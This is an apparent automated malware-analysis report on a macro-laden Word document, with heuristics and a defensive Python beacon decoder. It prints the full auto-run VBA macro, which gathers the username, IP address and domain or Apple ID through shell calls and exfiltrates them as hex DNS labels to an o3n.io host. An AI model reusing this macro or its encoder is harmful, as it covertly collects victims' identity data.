Verdict: MALICIOUS
Risk Score: 378
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1105 Ingress Tool Transfer (not evidenced in the extracted source: the macro sends host data out, it does not fetch a payload)
The sample contains VBA macros with a Document_Open auto-execution macro. On Windows it uses WScript.Shell to run ipconfig.exe and whoami /upn and collects the local IPv4 address, the username (Environ$("username")) and the UPN domain; on macOS it uses MacScript("do shell script ...") with route, ifconfig, id and dscl (or the Mail application on older Office builds) to collect the IP address, username and Apple ID / mail address. Mangle_Request hex-encodes these values into DNS labels (user data, then username, an OS tag uW or uM, the IP, and the marker MW) in front of the hard-coded base domain ending in .o3n.io, and Trigger_Token passes the resulting "http://" URL to Application.Documents.CanCheckOut. That call makes Word resolve and contact the host, with any error silently swallowed by On Error. The macro is therefore a host-identification beacon: it exfiltrates username, IP address and domain or Apple ID through the hostname of a single request. No download or execution of a second-stage payload appears in the extracted source. The presence of the SE_ENABLE_LURE heuristic indicates the document likely prompts the user to enable macros, a common social-engineering tactic.
Heuristics (10)
- ClamAV: Doc.Malware.Valyria-10010011-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Valyria-10010011-0
- VBA project inside OOXML (medium, OOXML_VBA, 6 related findings): document contains a VBA project; VBA macros present
- Potential Shell call in VBA (critical, OLE_VBA_SHELL). Matched lines in script:
    Dim script As String
    RetVal = MacScript("do shell script ""route -n get default""")
    Interface = Split(Split(RetVal, vbCr)(4), ": ")(1)
- WScript.Shell usage (critical, OLE_VBA_WSCRIPT). Matched lines in script:
    Dim sArr() As String
    Set WshShell = VBA.CreateObject("WScript.Shell")
    Set oExec = WshShell.exec("ipconfig.exe")
- CreateObject call (high, OLE_VBA_CREATEOBJ). Matched lines in script (same location as the WScript.Shell finding):
    Dim sArr() As String
    Set WshShell = VBA.CreateObject("WScript.Shell")
    Set oExec = WshShell.exec("ipconfig.exe")
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable. Here the decoded source is available and agrees with the p-code finding.
- Document_Open macro (low, OLE_VBA_DOCOPEN). Matched lines in script:
    Attribute VB_Customizable = True
    Private Sub Document_Open()
    #If Mac Then
- Environ() call (env variable access) (low, OLE_VBA_ENVIRON). Matched lines in script:
    Dim sUsername As String
    sUsername = Environ$("USER")
    Mac_Get_Username = sUsername
- Macro/content-enable lure (medium, SE_ENABLE_LURE): document instructs the user to enable macros or editing, a common technique used by malware droppers to bypass Office macro security settings
- Embedded URL (info, EMBEDDED_URL): one or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All 28 URLs below were found in the document text (OOXML body / shared strings) and are XML namespace identifiers from standard Word markup, not network indicators. The host the macro actually contacts is assembled at runtime from the BASE constant in Module1 (ending in .o3n.io) and does not appear in this static list.
    http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas
    http://schemas.microsoft.com/office/drawing/2014/chartex
    http://schemas.microsoft.com/office/drawing/2015/9/8/chartex
    http://schemas.microsoft.com/office/drawing/2015/10/21/chartex
    http://schemas.microsoft.com/office/drawing/2016/5/9/chartex
    http://schemas.microsoft.com/office/drawing/2016/5/10/chartex
    http://schemas.microsoft.com/office/drawing/2016/5/11/chartex
    http://schemas.microsoft.com/office/drawing/2016/5/12/chartex
    http://schemas.microsoft.com/office/drawing/2016/5/13/chartex
    http://schemas.microsoft.com/office/drawing/2016/5/14/chartex
    http://schemas.openxmlformats.org/markup-compatibility/2006
    http://schemas.microsoft.com/office/drawing/2016/ink
    http://schemas.microsoft.com/office/drawing/2017/model3d
    http://schemas.openxmlformats.org/officeDocument/2006/relationships
    http://schemas.openxmlformats.org/officeDocument/2006/math
    http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing
    http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
    http://schemas.openxmlformats.org/wordprocessingml/2006/main
    http://schemas.microsoft.com/office/word/2010/wordml
    http://schemas.microsoft.com/office/word/2012/wordml
    http://schemas.microsoft.com/office/word/2018/wordml/cex
    http://schemas.microsoft.com/office/word/2016/wordml/cid
    http://schemas.microsoft.com/office/word/2018/wordml
    http://schemas.microsoft.com/office/word/2015/wordml/symex
    http://schemas.microsoft.com/office/word/2010/wordprocessingGroup
    http://schemas.microsoft.com/office/word/2010/wordprocessingInk
    http://schemas.microsoft.com/office/word/2006/wordml
    http://schemas.microsoft.com/office/word/2010/wordprocessingShape
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 6606 bytes | 2e188e110157f32231f8afed4df361b88370c096ebc23a6193761b82784912b1 |
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 22016 bytes | da6d31c8a750aabe90c47e2174d6b4970bec4a772f60e518f0adba5dfe853106 |

Preview of macros.bas (first 1,000 lines of the extracted script). The file holds two modules back to back: ThisDocument, which carries the Document_Open trigger, followed by Module1, which carries the collection, encoding and beacon routines.

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
#If Mac Then
ip = Module1.Mac_Get_IP
username = Module1.Mac_Get_Username
appid = Module1.Mac_Get_AppleID
request = Module1.Mangle_Request(appid, username, ip, "M")
#Else
ip = Module1.Windows_Get_IP
username = Module1.Windows_Get_Username
domain = Module1.Windows_Get_Domain
request = Module1.Mangle_Request(domain, username, ip, "W")
#End If
Module1.Trigger_Token (request)
End Sub
Attribute VB_Name = "Module1"
Option Explicit
Public Const BASE = ".lye04n5skx8tl4ter9la0r0t5.49d185155faa.o3n.io..................................................................................................."
Public Const EOS = "..."
Public Function Trigger_Token(request As String)
On Error GoTo Err_Trigger
Application.Documents.CanCheckOut ("http://" & request)
Err_Trigger:
Exit Function
End Function
Public Function Mac_Get_IP() As String
On Error GoTo Err_IP
Dim RetVal As String
Dim Interface As String
Dim Length As Integer
Dim script As String
RetVal = MacScript("do shell script ""route -n get default""")
Interface = Split(Split(RetVal, vbCr)(4), ": ")(1)
RetVal = MacScript("do shell script ""ifconfig " + Interface + " inet""")
Mac_Get_IP = Split(Split(RetVal, "inet ")(1), " ")(0)
Exit_IP:
Exit Function
Err_IP:
Mac_Get_IP = "none"
Resume Exit_IP
End Function
Public Function Mac_Get_AppleID() As String
On Error GoTo Err_AppleID
Dim RetVal As String
Dim script As String
#If MAC_OFFICE_VERSION >= 15 Then
Dim User As String
Dim Email As String
Dim EmailArr() As String
Dim Length As Integer
User = MacScript("do shell script ""id -un"" ")
script = "do shell script ""dscl . -read /Users/" & User & " RecordName"""
RetVal = MacScript(script)
EmailArr = Split(RetVal, " ")
Length = UBound(EmailArr) - LBound(EmailArr) + 1
Dim i As Integer
For i = 0 To Length - 1
If EmailArr(i) Like "*@*" Then
RetVal = EmailArr(i)
Exit For
End If
Next i
#Else
script = "tell application " & Chr(34) & "Mail" & Chr(34) & _
" to get email addresses of every account"
RetVal = MacScript(script)
#End If
Mac_Get_AppleID = Trim(RetVal)
Exit_AppleID:
Exit Function
Err_AppleID:
Mac_Get_AppleID = "none"
Resume Exit_AppleID
End Function
Public Function Mac_Get_Username() As String
On Error GoTo Err_Username
Dim sUsername As String
sUsername = Environ$("USER")
Mac_Get_Username = sUsername
Exit_Username:
Exit Function
Err_Username:
Mac_Get_Username = "none"
Resume Exit_Username
End Function
Public Function Windows_Get_IP() As String
On Error GoTo Err_IP
Dim WshShell As Object
Dim oExec As Object
Dim sOutput As String
Dim sArr() As String
Set WshShell = VBA.CreateObject("WScript.Shell")
Set oExec = WshShell.exec("ipconfig.exe")
oExec.StdIn.Write "/a"
sOutput = oExec.StdOut.ReadAll()
sArr = Split(Split(Split(sOutput, "IPv4 Address")(1), ":")(1), " ")
Windows_Get_IP = Replace(Replace(Trim(sArr(1)), Chr(10), ""), Chr(13), "")
Exit_IP:
Exit Function
Err_IP:
Windows_Get_IP = "none"
Resume Exit_IP
End Function
Public Function Windows_Get_Username() As String
On Error GoTo Err_Username
Dim sUsername As String
sUsername = Environ$("username")
Windows_Get_Username = sUsername
Exit_Username:
Exit Function
Err_Username:
Windows_Get_Username = "none"
Resume Exit_Username
End Function
Public Function Windows_Get_Domain() As String
On Error GoTo Err_Domain
Dim WshShell As Object
Dim oExec As Object
Dim sOutput As String
Dim sArr() As String
Dim sErr As String
Set WshShell = VBA.CreateObject("WScript.Shell")
Set oExec = WshShell.exec("whoami /upn")
Do While oExec.Status = 0
DoEvents
Loop
sOutput = oExec.StdOut.ReadAll()
sErr = oExec.StdErr.ReadAll()
If sErr Like "*ERROR*" Then
Set oExec = WshShell.exec("whoami /user /NH")
sOutput = oExec.StdOut.ReadAll()
Windows_Get_Domain = Trim(Split(sOutput, "\")(0))
Else
Windows_Get_Domain = Trim(Split(sOutput, "@")(1))
End If
Exit_Domain:
Exit Function
Err_Domain:
Windows_Get_Domain = "none"
Resume Exit_Domain
End Function
Public Function Mangle_Request(ByVal userData As String, ByVal username As String, ByVal ip As String, ByVal os As String) As String
Dim sRequest As String
Dim sMaxLength As Long
Dim reducedBase As String
reducedBase = Left(BASE, InStr(BASE, EOS) - 1)
sRequest = EncodeHex(username, "") & ".u" & os & "." & EncodeHex(ip, "") & ".MW" & reducedBase
sMaxLength = 250 - Len(sRequest)
If Len(userData) > 0 Then
sRequest = AddExtra(userData, sMaxLength) & ".d." & sRequest
Else
sRequest = EncodeHex("none", "") & ".d." & sRequest
End If
Mangle_Request = sRequest
End Function
Private Function AddExtra(userData As String, sMaxLength As Long) As String
Dim i As Long
Dim enLen As Long
Dim sTestUrl As String
Dim encoded As String
Do
sTestUrl = ""
encoded = EncodeHex(userData, "")
i = 1
enLen = Len(encoded)
Do While i < enLen
If i + 62 > enLen Then
sTestUrl = sTestUrl & Mid(encoded, i, enLen)
Else
sTestUrl = sTestUrl & Mid(encoded, i, 63) & "."
End If
i = i + 62
Loop
If Len(sTestUrl) <= sMaxLength Then
Exit Do
End If
userData = Left(userData, Len(userData) - 2)
Loop
AddExtra = sTestUrl
End Function
Private Function EncodeHex(sData As String, Optional HexPrefix As String = "0x") As String
Dim iChar As Integer
Dim sOutString As String
Dim sTmpChar As String
sOutString = ""
For iChar = 1 To Len(sData)
sTmpChar = Hex$(Asc(Mid(sData, iChar, 1)))
If Len(sTmpChar) = 1 Then sTmpChar = "0" & sTmpChar
sOutString = sOutString & sTmpChar
Next iChar
EncodeHex = sOutString
End Function
```
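The hostname that Mangle_Request builds is the only network indicator this sample produces, and it changes with every victim, so a static URL list will never contain it. The block below is an added example, not part of the analyzer report or the sample: a Python port of the macro's EncodeHex, AddExtra and Mangle_Request routines (so the exact label layout can be reproduced for a given host), plus a decoder that recovers the exfiltrated username, IP address, OS tag and domain / Apple ID from any beacon hostname found in DNS or proxy logs. BASE and EOS are copied from Module1 (the run of trailing dots is shortened, since only the part before the first "..." matters); the function names mangle_request, decode_beacon and find_beacons, the hosts and users, and the resolver log lines are constructed for this illustration.

```python
import re

# Copied from Module1 of the extracted macro (dot padding shortened;
# Mangle_Request keeps only what precedes the first "...").
BASE = ".lye04n5skx8tl4ter9la0r0t5.49d185155faa.o3n.io......................"
EOS = "..."
OS_TAG = re.compile(r"u[WM]")          # "uW" (Windows) or "uM" (macOS)


def encode_hex(data: str) -> str:
    """Port of EncodeHex: two uppercase hex digits per character."""
    return "".join(f"{ord(ch) & 0xFF:02X}" for ch in data)


def add_extra(user_data: str, max_len: int) -> str:
    """Port of AddExtra. The macro emits 63-character labels but advances
    its cursor by 62, so adjacent labels share one hex digit; it then trims
    the user data two characters at a time until the result fits max_len."""
    while True:
        encoded = encode_hex(user_data)
        n, i, out = len(encoded), 1, ""      # VBA Mid() is 1-based
        while i < n:
            if i + 62 > n:
                out += encoded[i - 1:]        # Mid(encoded, i, enLen): the remainder
            else:
                out += encoded[i - 1:i + 62] + "."
            i += 62
        if len(out) <= max_len or not user_data:   # guard against an endless loop
            return out
        user_data = user_data[:-2]


def mangle_request(user_data: str, username: str, ip: str, os_tag: str) -> str:
    """Port of Mangle_Request: the host name the macro passes to
    Application.Documents.CanCheckOut("http://" & request)."""
    reduced_base = BASE[:BASE.index(EOS)]
    request = f"{encode_hex(username)}.u{os_tag}.{encode_hex(ip)}.MW{reduced_base}"
    max_len = 250 - len(request)
    extra = add_extra(user_data, max_len) if user_data else encode_hex("none")
    return f"{extra}.d.{request}"


def decode_hex(text: str):
    """Inverse of encode_hex; None when the label is not an even-length hex string."""
    try:
        return bytes.fromhex(text).decode("latin-1")
    except ValueError:
        return None


def decode_beacon(hostname: str):
    """Recover the exfiltrated fields from a beacon host name, or None if the
    layout <hex chunks>.d.<hex user>.u<W|M>.<hex ip>.MW.<base> is absent."""
    labels = [lab for lab in hostname.strip(".").split(".") if lab]
    if "d" not in labels:
        return None
    d = labels.index("d")
    tail = labels[d + 1:]
    if len(tail) < 5 or not OS_TAG.fullmatch(tail[1]) or tail[3] != "MW":
        return None
    chunks = labels[:d]                      # undo the one-digit overlap
    joined = chunks[0] + "".join(c[1:] for c in chunks[1:]) if chunks else ""
    fields = [decode_hex(tail[0]), decode_hex(tail[2]), decode_hex(joined)]
    if any(f is None for f in fields):
        return None
    return {"os": tail[1][1], "username": fields[0], "ip": fields[1],
            "user_data": fields[2], "base": ".".join(tail[4:])}


def find_beacons(log_lines):
    """Scan free-form log lines (DNS, proxy, ...) for host names in the beacon format."""
    hits = []
    for line in log_lines:
        for token in re.findall(r"[A-Za-z0-9.\-]+", line):
            decoded = decode_beacon(token)
            if decoded:
                hits.append(decoded)
    return hits


# Constructed resolver log lines; the first carries a beacon built with the port above.
SAMPLE_DNS_LOG = [
    "2024-05-02T10:14:03Z client=10.0.0.23 query=A "
    + mangle_request("CORP.EXAMPLE", "alice", "10.0.0.23", "W"),
    "2024-05-02T10:14:05Z client=10.0.0.23 query=A www.example.com",
]

if __name__ == "__main__":
    for hit in find_beacons(SAMPLE_DNS_LOG):
        print(hit)
```

Because the payload rides in the query name, a resolver or proxy log is enough to reconstruct exactly what left the host; the decoder needs no key, only the label layout. Hunting on the fixed suffix alone (the MW marker and the o3n.io base) is cheap, but the decoder is what turns a hit into the affected user and machine.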
Detection
ClamAV: Doc.Malware.Valyria-10010011-0
Obfuscation or payload: unlikely